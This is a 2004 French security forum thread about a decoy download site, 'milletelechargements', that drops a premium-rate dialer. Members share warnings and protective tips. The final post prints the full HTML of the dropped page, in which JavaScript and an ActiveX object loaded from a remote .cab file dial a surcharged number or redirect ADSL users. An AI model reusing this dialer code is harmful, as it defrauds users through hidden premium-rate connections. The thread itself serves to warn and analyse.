"milletelechargements"

Sécurité et insécurité. Virus, Trojans, Spywares, Failles etc. …

Modérateur: Modérateurs et Modératrices

Règles du forum
Assiste.com a suspendu l'assistance à la décontamination après presque 15 ans sur l'ancien forum puis celui-ci. Voir :

Procédure de décontamination 1 - Anti-malware
Décontamination anti-malwares

Procédure de décontamination 2 - Anti-malware et antivirus (La Manip)
La Manip - Procédure standard de décontamination

Entretien périodique d'un PC sous Windows
Entretien périodique d'un PC sous Windows

Protection des navigateurs, de la navigation et de la vie privée
Protéger le navigateur, la navigation et la vie privée

"milletelechargements"

Messagede Tartampion » 01 Aoû 2004, 09:24

Bonjour,
tout d'abord félicitations pour le super boulot que vous faites, le site est carrément génial.
Voilà, je post pour signaler le fait suivant:
À partir d'une recherche sur Google, j'ai choisi un lien qui indiquait un site de téléchargement "milletelechargements" en fait
c'est une page leurre, quand vous cliquer sur suivant cela crée un dossier sur C: nommé "Nero_FR_google" ainsi qu'une
connexion 56k vers ce n°"0836012015".

J'ai conservé le dossier si cela intéresse qq.
Tartampion
Tartampion
 
Messages: 4
Inscription: 01 Aoû 2004, 09:14

Messagede Tesgaz » 01 Aoû 2004, 09:56

Salut Tartampion,

merci d'avoir indiqué cette page piégée,

pour information, toujours télécharger ses logiciels sur le site de l'auteur, c'est préférable, en plus on apprend toujours des infos dessus, car il y a souvent une FAQ, les bugs répertoriés, etc..
Avatar de l’utilisateur
Tesgaz
 
Messages: 2133
Inscription: 23 Juil 2004, 12:49
Localisation: ici : ---------------------> X

Messagede pierre » 01 Aoû 2004, 13:50

Bonjour Tartampion et bienvenue,

Ceci correspond à l'adresse IP 49.212.135.239

Tu as quelques notes et des convertisseurs à propos des adresse IPs codées en décimal au lieu de IPV4
http://assiste.com/p/frameset/03_05.php

Oui, le contenu du dossier m'interresse. Merci de le copier ici si c'est un court code HTML sinon nous en reparlons dans un MP.
Image
__________________
Pierre (aka Terdef)
Appel à donation - Le site a besoin de votre aide

Comment je me fais avoir/infecter ? - Protéger navigateur, navigation et vie privée - Bloquer publicité et surveillance sur le Web
Accélérer Windows - Accélérer Internet - Décontamination - Installer Malwarebytes - Forums d'entraide

Il ne sera répondu à aucune demande de dépannage posée en MP (Messagerie Privée). Les demandes doivent être publiques et les réponses doivent profiter au public.
Image
Avatar de l’utilisateur
pierre
 
Messages: 27055
Inscription: 20 Mai 2002, 23:01
Localisation: Ici et maintenant

Messagede Vazkor » 01 Aoû 2004, 17:11

Bonjour à tous,

J'ai testé l'adresse IP donnée par Pierre. Erreur de connexion chez moi.
Le numéro serait plutôt un N° Tél 0836/012015 surtaxé.

Par contre une recherche sur Google avec "milletelechargements" donne plus de 3000 résultats dont plus de 2000 en français.

J'ai trouvé des posts intéressants sur des forums, dont PC Astuces:

Connexion sur site payant sans le savoir http://forums.phpbb-fr.com/viewtopic_46124.html

Ne pas aller sur ce site >>Dialer !! http://forum.pcastuces.com/sujet.asp?SUJET_ID=82009
-> http://forum.pcastuces.com/sujet.asp?SUJET_ID=81993
-> Comment marche un Dialer ? http://forum.pcastuces.com/sujet.asp?SU ... 182&Page=1 (il y a deux pages)
J'épingle au passage: Voir le lien ci-dessus, ce n'est pas sur un site X ou de warez, ç'est sur le site de "Messenger plus", ...
Un rapport d'Adaware sur SYSWEBSOFT et SYSWEB-TELECOM DIALER (en fin de la page 2)

-> http://forum.pcastuces.com/sujet.asp?SUJET_ID=69403

Lu sur Guilde Educ Liens pour l'Educ http://www.ac-grenoble.fr/carmi-interne ... p?type=pao
des milliers de logiciels tous domaine a telecharger gratuit
http://1.milletelechargements.com
2004-05-12 - etalys

* 2004-07-04 - olivier : ce site est une arnaque avec installation d'un dialer et connexion sur un numéro surtaxé

Comme quoi, même des sites sérieux se font piéger!

J'ai constaté que de plus en plus les sites de warez utilisent des connexions surtaxées pour se faire du fric .
C'est pas foncièrement malhonnête quand c'est clairement affiché. Vous payez le logiciel piraté en payant autant pour la connexion et autant de cents la minute pendant le téléchargement.
Pas d'accès si vous n'avez pas une connexion RTC active. C'est pas plus mal. Il faut avoir le réflexe immédiat d'annuler le chargement du dialer, même si vous êtes en ADSL ou sur le câble.

J'arrête ici. Je ne vais suivre les 2000 liens.

@+
Avatar de l’utilisateur
Vazkor
 
Messages: 9808
Inscription: 05 Nov 2002, 23:39
Localisation: Ans, BE

Messagede Vazkor » 01 Aoû 2004, 23:30

[Msg déplacé pour rester dans le même fil - Vazkor]

kareldjag a écrit:salut a tous en général et à TARTAMPION en particulier
Je posséde un PC depuis 5 mois seulement et j'ai appris à me méfier :Internet est un jungle minée de toutes parts!
1-Il faut se méfier des sites de téléchargement( mëme les + connus comme "telecharger.com" qui est blocké par SPYBLOCKER)
Dans la mesure de ses moyens,il ne faut pas hésiter à acheter des compils de logiciels au kiosquier du coin car il sont "cértifiés" exempts de virus.Sinon aller sur le site de l'editeur.
2-Avec un connexion ADSL il ya peu de risques,mais il vaut mieux paramètrer sa connexion :option internet puis onglet connexion puis cochez la case "ne jamais établir de connexion"
3-Tu peux également t'équiper de softs de sécurité tels PESTPATROL,SPYBOT,A2.
Il existe aussi un logiciel spécialisé anti-dialer et gratuit conçu pour lutter contre la fraude par connexions surtaxées sur le site canadien:
symcod.com.Se renseigner avant de le télécharger et de l'utiliser(avis aux "masters" d'assiste)
PS:les dialers sont surtout présents sur les sites pornos;alors qui sy frotte s'y pique! :wink:
Avatar de l’utilisateur
Vazkor
 
Messages: 9808
Inscription: 05 Nov 2002, 23:39
Localisation: Ans, BE

Messagede Tartampion » 02 Aoû 2004, 08:58

Salut Pierre,
Voilà le code html, il y a également un fichier .swt un fichier .tmp et un .txt
créé ds documents and settings
@+
<html>
<head>
<title>| ZONAHARDCORE.COM | Acceso a la mayor red de contenidos de sexo |</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<style type="text/css">
.t11px { font-family: Tahoma; font-size: 11 px; text-decoration: none}
.lay1
{position: absolute;
width: 346px;
height: 64px;
left: 50%;
top: 50%;
z-index: 2;
margin-left: -173px;
margin-top: -32px;

border: 1px solid black;

font-family: arial, helvetica, sans-serif;
font-size: 14px;
background-color: #FFFFFF;
layer-background-color:#CCCC99;
color: #000000;
visibility: hidden;}
</style>
<SCRIPT language=JavaScript>
function datos(){
window.open('http://www.syswebtelecom.com/aviso/aviso.htm','c','width=450,height=300,scrollbars=no,resizable=no')
}
setInterval("window.status='| ZONAHARDCORE.COM | Acceso a la mayor red de contenidos de sexo |'",5);
</script>
<SCRIPT LANGUAGE="JavaScript">
function condiciones(link) {
window.open(link,'_blank','width=372,height=216,scrollbars');
}

var estadoboton = 1;
var argstr = location.search.substring(1, location.search.length);
var args = argstr.split('&');
var estag = false;
for (var i = 0; i < args.length; i++){
if(args[i] == "g=si" || args[i] == "g=SI" || args[i] == "g=1")
estag = true;
}

var flag=1;
function detalle(i) {
if (document.layers) { // Set visibility for NN and IE
visible = 'show';
hidden = 'hide';
}
else
if (document.all || document.getElementById) {
visible = 'visible';
hidden = 'hidden';
}
x = 'Layer'+i;
if (document.layers) {
lay2 = document.layers[x];
}
else if (document.all) {
lay2 = document.all(x).style;
}
else if (document.getElementById) {
lay2 = document.getElementById(x).style;
}
if (flag==0)
{ flag =1;
lay2.visibility = hidden;
}
else
{ flag =0;

lay2.visibility = visible;
}
}

</SCRIPT>

<SCRIPT LANGUAGE="JavaScript" FOR="ObjSysWebTelecom" EVENT="OnErrorConectando()">
<!--
conectando=false; conectado=false;
//-->
</SCRIPT>

<SCRIPT LANGUAGE="JavaScript" FOR="ObjSysWebTelecom" EVENT="OnConectar()">
<!--
conectando=false; conectado=true;

//-->
</SCRIPT>

<SCRIPT LANGUAGE="JavaScript" FOR="ObjSysWebTelecom" EVENT="OnDesconectar()">
<!--
conectado=false;
//-->
</SCRIPT>

<SCRIPT language=JavaScript>
var timer;
var ready = false;
var conectando = false;
var conectado = false;

function conectar() {
clickentrar();
detalle(0);
if ((!conectando) && (!conectado) && (ready)) {
if (ObjSysWebTelecom.isAdsl == true) {
document.URL = "http://adsl.contenidoamateur.com/?capa=11n&usuario="+"Nero_FR_Google";
} else {
ObjSysWebTelecom.Conectar();
conectando=true;
}
} else {
if ((conectado) && (ready))
ObjSysWebTelecom.Desconectar();
}
}

function arrancar() {
if (ready) {
ObjSysWebTelecom.Categoria="b1&c=1";
ObjSysWebTelecom.inicio("Nero_FR_Google",'3','http://dialers2.syswebtelecom.com/');
}
}

function setready (state) {
ready = state;
if (!ready && !conectando) {
alert("El Visor de Contenidos no se ha cargado correctamente.\n\nPulse \'SI\' en el certificado para volver a intentarlo.");
if(estag)
history.back();
else
location.reload();
}
else {
timer = setTimeout("arrancar()",1000);
}
}

function clickentrar(){
if (estadoboton == 1) {
document.getElementById('entrada').value = "ENTRAR >>";
estadoboton = 2;
} else {
document.getElementById('entrada').value = "CONECTANDO";
}
}
</SCRIPT>
<body bgcolor="#FFFFFF" link="#000000" vlink="#000000" alink="#000000" onload=clickentrar();>
<div id="Layer0" class="lay1" style="top: 200px" align="center">
<table width="100%" border="0" cellspacing="5" cellpadding="0">
<tr>
<td><div align="center"><b><font color="#000000">CONECTANDO, POR FAVOR ESPERE</font></b></div></td>
</tr>
<tr>
<td><div align="center"><img src="barra_once.gif" width="311" height="21"></div></td>
</tr>
</table></div>
<table width="100%" height="100%%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="middle"><table width="350" border="0" align="center" cellpadding="10" cellspacing="1" bgcolor="#000000">
<tr>
<td align="center" valign="middle" bgcolor="#ABABAB"><p><img src="index_logo.gif" width="189" height="88"></p>
<p>
<input type="button" name="entrada" style="font-family: Tahoma; font-size: 18px; font-weight: bold; border-top-width: 2px; border-right-width: 2px; border-bottom-width: 2px; border-left-width: 2px; cursor: hand" value="ESPERE" onclick="javascript:conectar();">
</p>

<p>
<font size="2" face="Arial, Helvetica, sans-serif"><a href="javascript:condiciones('http://ip.sponsoradulto.com/terms.php')">T&eacute;rminos y condiciones</a></font>
<br>
</p></td>
</tr>
</table>
<table border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td class="t11px"><div align="center"><font color="#000000"><br><!-- EMPTY FOOTER TEXT --></font></div></td>
</tr>
</table>
<blockquote>
<blockquote>&nbsp;</blockquote>
</blockquote></td>
</tr>
</table>
<OBJECT ID="ObjSysWebTelecom" CLASSID="CLSID:EFB22865-F3BC-4309-ADFA-C8E078A7F762" WIDTH=0 HEIGHT=0 CODEBASE="http://www.sponsoradulto.com/es/SysWebTelecom.cab#Version=1,0,0,5" ONREADYSTATECHANGE=setready(true) ONERROR=setready(false)>
</OBJECT>
</body>
</html>
Tartampion
 
Messages: 4
Inscription: 01 Aoû 2004, 09:14


Retourner vers Sécurité (Contamination - Décontamination)

Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 24 invités